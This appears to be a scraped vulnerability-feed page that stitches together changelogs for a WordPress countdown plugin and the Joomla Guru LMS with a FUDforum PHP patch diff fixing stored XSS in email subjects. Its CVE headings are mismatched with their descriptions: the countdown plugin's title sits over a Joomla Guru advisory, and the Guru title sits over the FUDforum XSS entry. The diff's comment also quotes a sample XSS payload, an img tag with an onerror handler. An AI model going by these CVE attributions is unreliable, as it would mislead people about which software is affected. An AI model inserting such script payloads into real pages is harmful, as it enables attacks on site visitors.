*   Bug fixed
*   Code improvement
*   Subscription (form and subscribers section) PRO

**1.2.3**

*   Bug fixed

**1.2.2**

*   User Role section (new)
*   Countdown timer insert media button (new)
*   Countdown timer widget (new)
*   Countdown delete data option (new)
*   Timer End Sound (new)
*   Support menu tab (new)
*   show countdown for selected countries (new pro)
*   bug fixed
*   Code optimizations

**1.2.1**

*   Countdown responsiveness
*   Countdown alignment
*   Countdown On of logic
*   Hide on mobile devices (pro)
*   Show on mobile devices (pro)
*   Bug fixes
*   Code optimization

**1.2.0**

*   Shortcode view improvment
*   Bug fixed
*   Code optimization
*   Flip clock NEW countdown type (Pro)

**1.0.9**

*   Time Zone
*   Circle Countdown Popup type (Pro)
*   code improvement

**1.0.8**

*   Countdown padding
*   Start Angle
*   Font Size
*   Font Weight
*   Countdown padding
*   Font Family (PRO)
*   Countdown Days Text Color (PRO)
*   Countdown Hours Text Color (PRO)
*   Countdown Minutes Text Color (PRO)
*   Countdown Seconds Text Color (PRO)
*   Background Circle (PRO)
*   Background Image (PRO)

**1.0.6**

*   Circle Width
*   Background Width
*   Countdown Days Color (PRO)
*   Countdown Hours Color (PRO)
*   Countdown Minutes Color (PRO)
*   Countdown Seconds Color (PRO)
*   After Countdown Expire Default
*   After Countdown Expire Hide Countdown
*   After Countdown Expire Show Text (PRO)
*   After Countdown Expire Redirect To URL (PRO)
*   Bug fixed
*   Design fixed

**1.0.5**

*   Countdown live preview
*   js code optimization

**1.0.4**

*   Countdown background circle
*   Countdown direction
*   Countdown bug fixed

**1.0.3**

*   Countdown days on of logic
*   Countdown days text
*   Countdown hours on of logic
*   Countdown hours text
*   Countdown minutes on of logic
*   Countdown minutes text
*   Countdown seconds on of logic
*   Countdown seconds text
*   Countdown js code optimization
*   Countdown admin design improvement

**1.0.2**

*   Countdown width
*   Bug fixed

**1.0.1**

*   Countdown animation
*   Code improvement

**1.0**

*   Plugin publish

CVE-2022-29423: Countdown, Coming Soon, Maintenance – Countdown & Clock

Joomla Guru extension 5.2.5 is affected by: Insecure Permissions. The impact is: obtain sensitive information (remote). The component is: Access to private information and components, possibility to view other users' information. Information disclosure Access to private information and components, possibility to view other users' information.

**6.0.1**

**Bug Fixes**

*   Update guru config
*   Fix missing og (Open Graph) tag
*   Fix installer issue
*   Fix redactor editor when add question

**6.0.0 Stable**

**New Updates**

*   Joomla 4 support
*   Fully PHP8 support

**Improvements**

*   Course list layout: improved default view and new list view
*   Course detail layout: improved default view and new Modern view
*   Improved Lesson layout and support dark and light theme
*   All pages are improved for better layout & style
*   Improved responsive for all pages.
*   Back-end dashboard improvements
*   Social sharing and Open Graph
*   Bug fixes

View details

**6.0.0 Beta**

**New Updates**

*   Joomla 4 compatibility
*   Fully PHP8 support

**Improvements**

*   Improved design for all pages
*   New course list view - List view
*   New course detail view - Modern view
*   Lesson layout with dark and light theme
*   Back-end dashboard improvements

View details

**5.2.5**

**New payment plugins**

*   New Stripe SCA payment plugin
*   New PayPal Smart Payment Plugin

**Bug Fixes**

*   The sequential lesson cannot be selected
*   Fix 404 error when editing module on the frontend
*   Fix search (everything) error on frontend
*   The fix could not open page 2 on quiz results
*   Optimize workflow of adding a question to the quiz
*   Support Latest version of JW all videos plugin in Guru
*   Add zoom meeting media type
*   Complete course when teacher score essay
*   Fix outdated courses still shows on an author page
*   Fix save lesson error when kunena is installed
*   Show disabled payment methods on order list in the backend
*   Fix redirect login on multilingual didn’t keep the current language
*   Add search menu type for Guru
*   Fix exam score N/A on the certificate

View details

**5.2.4**

**Bug Fixes**

*   Student activation by super user
*   Fix override admin email when install
*   Sparate email enroll for teach and admin
*   Index database when install
*   Render sidebar when open modal
*   Fix missing jquery on yootheme
*   Fix uikit noconflict error with yoo theme
*   Increase size of media text
*   Change media column datatype to avoid media error
*   Fix duplicated id error
*   Invalid token when trying to see more than 20 uploaded projects by students
*   Remove unused parameters

**Improvements**

*   More option in Export data
*   Improve load speed guru backend

**5.2.3**

**Bug Fixes**

*   Promocode used for multiple times for the same user
*   Teachers - Students page load slowly
*   Promocode still able to used even before start date
*   Time bug when create order at backend
*   Prevent unlimited plan
*   Lessons not showing correctly when going through course
*   Status doesn't update on serial order lesson
*   Notice error on Teacher's student page
*   Course Manager: Can't filter Course by status
*   Some bugs in Media Library
*   Got error database when duplicate pending Course
*   Order Manager's toolbar need more styled

**New feature**

*   Add Student Chart Feature in Guru

**Improvement**

*   Send Purchase Email on Enroll

**5.2.2**

**Bug Fixes**

*   added new changes on preview certificate
*   fixed issue, user can access lessons/exercises when license expired
*   Fixed issue with Articulate SCORM
*   Fixed issue with multiple emails send to students
*   Bug: Guru students assigned to JS group as admin
*   Add media in course not working
*   Can not delete courses from cart

**Improvements**

*   How to create clickable image that expands into lightbox inside lessons
*   Uikit from 2.0 to 3.0
*   Option to show or not lesson status un course

**5.2.1**

**New features**

*   2Checkout Payment Plugin
*   Privacy for files
*   Guru – Events for JomSocial
*   Course review only by Super Admin

**Improvements**

*   Page title seo improvements
*   Free course should not show 00 in price
*   Add company Name value variable
*   Login Logout redirections
*   Collapsible menu for dashboard items
*   Allow admin to change the order of course
*   Display category of a course in "my courses" list
*   Translate Unlimited in courses
*   More option in Date formate
*   Close all' instead of '+Show all?

**Bug Fixes**

*   JCE editor layout issue on backend
*   Hide FB and Twiiter link in teacher profile

**5.2.0**

**New Features :**

*   Custom Certificate option
*   Login Redirection for Teachers
*   Icon control on certificate page
*   Editor support for Teachers
**Improvements :**

*   **Mask the password and secret key in PayPal Pro** : New update will mask the password and private key in papal payment plugin.
*   **Plugin support - System - User Actions Log** : User action log supported with Guru
*   **RTL Support for quiz** : RTL support added for quiz lesson in courses
*   **Certificate URL in Email** : Certificate URL added for certificate email (Student can view certificate via Email link )
*   **Add option to allow/disallow to delete their own course** : Admin can allow/disallow teachers to delete their own course, You can find these setting on Guru backend > Teacher setting are.
*   **Increase Quiz time** : Now you can add quiz timer from 1 to 150 mins or unlimited.
*   **Editor support for Essay in Quiz** : Essay type question support editor in quiz.
*   **Price with decimals** : Yen currency support.
*   **Course displays empty tab when there is no course description** : Content tab of the course will be default if there is no content in description of course.

**Bug Fixes :**

*   Quiz is not published but still run exam time
*   Lesson dropdown broken with PHP 7.2 Guru Light
*   Breadcrumb displays error on course detail page
*   Typing mistake on Custom guru url page
*   Shouldnt allow to create new course category with empty category name
*   Got error when create duplicate course category name
*   Category List Layout Layout options not working
*   Guru search module show same results
*   Teacher list page use double slash in images
*   Database Error in My Projects page
*   Can't pick color on custom certificate tab
*   Background color, Font are not working on certificate pdf
*   Got error when using MPDF for certificate page
*   Student can edit teacher's course with URL
*   Got notice error in dashboard page
*   End publishing date is not working
*   Guru Search Courses module displays error in RTL
*   Got notice error when create a lesson with scorm
*   Color picker displays wrong position

**5.1.18**

**New Feature**

*   Implement Projects Results in back-end
*   Add GURU custom fields for registration form
*   Data in time column
*   Guru and JomSocial Groups
*   SCORM Support

**Improvement**

*   Mask the password and secret key in Paypal pro
*   Lesson should be removed right after clicking on delete icon
*   Should not allow to create duplicate lesson
*   Update language for Continue button

**Bug Fix**

*   Missing order option in backend for queeze question in file
*   Got warning error while saving lesson
*   Got warning error when select quizze
*   Cant upload file on lesson with project layout
*   Got warning error on Course category page
*   Can not reorder questions
*   Got warning error on students list take the quiz
*   Got error when remove and reselect quiz
*   Got warning error when there is no quiz in a course
*   Create new quiz button is not working on the frontend
*   Tabs in Final exam are not actived
*   Filter by quizzes type is not working
*   \[Media\] Auto play video is not working
*   \[Media\] Media filter works incorrectly after saving media
*   \[Media\] Got notice error when select article media
*   \[Lesson\] Cant show all lesson, should add scrollbar when there are many lessons
*   \[Lesson\] Got warning error when select project for lesson
*   \[Media\] Cant edit audio on the frontend
*   \[Commissions\] Export function is not working
*   \[Fields\] Typing mistake on create new field form
*   \[Course\] Can not play audio when the lesson is loaded
*   \[Course\] Got error duplicate entry after edit a lesson
*   \[Quiz\] Can not add question for quiz on the frontend
*   \[Media\] Got warning error on media library page
*   \[Quiz\] Audio is displaying not nice on the quiz page
*   \[Custom field\] Got error message after saving custom field

CVE-2022-23802: Guru Change Log - Joomla LMS - LMS for Joomla eLearning

FUDforum 3.1.1 is vulnerable to Stored XSS.

@@ -1,6 +1,6 @@ <?php /\*\* \* copyright : (C) 2001-2021 Advanced Internet Designs Inc. \* copyright : (C) 2001-2022 Advanced Internet Designs Inc. \* email : forum@prohost.org \* $Id$ \* @@ -38,6 +38,13 @@ function validate\_email($email)  
function encode\_subject($text) { /\* HTML entities check. \*/ if (strpos($subj, '&') !== false) { $subj = html\_entity\_decode($subj); }  
$text = htmlspecialchars($text); // Prevent XSS like <img src="1" onerror="alert()"\>  
if (preg\_match('!\[\\x7f-\\xff\]!', $text)) { $text = '\=?{TEMPLATE: iemail\_CHARSET}?B?'. base64\_encode($text) .'?='; } @@ -51,11 +58,6 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) return 0; }  
/\* HTML entities check. \*/ if (strpos($subj, '&') !== false) { $subj = html\_entity\_decode($subj); }  
if ($header) { $header = "\\n" . str\_replace("\\r", '', $header); } @@ -66,11 +68,11 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) $addronly = preg\_replace('/.\*</', '<', $from); // RFC 2822 Return-Path: <...> $header = 'From: '. $from ."\\nReturn-Path: ". $addronly ."\\nUser-Agent: FUDforum/". $GLOBALS\['FORUM\_VERSION'\] . $extra\_header . $header;  
$subj = encode\_subject($subj); $body = str\_replace("\\r", '', $body); if ($munge\_newlines) { $body = str\_replace('\\n', "\\n", $body); } $subj = encode\_subject($subj);  
// Call PRE mail plugins. if (defined('plugins')) { @@ -90,7 +92,7 @@ function send\_email($from, $to, $subj, $body, $header='', $munge\_newlines=1) } $smtp = new fud\_smtp; $smtp\->msg = str\_replace(array('\\n', "\\n."), array("\\n", "\\n.."), $body); $smtp\->subject = encode\_subject($subj); $smtp\->subject = $subj; $smtp\->to = $to; $smtp\->from = $from; $smtp\->headers = $header;

Tag

#php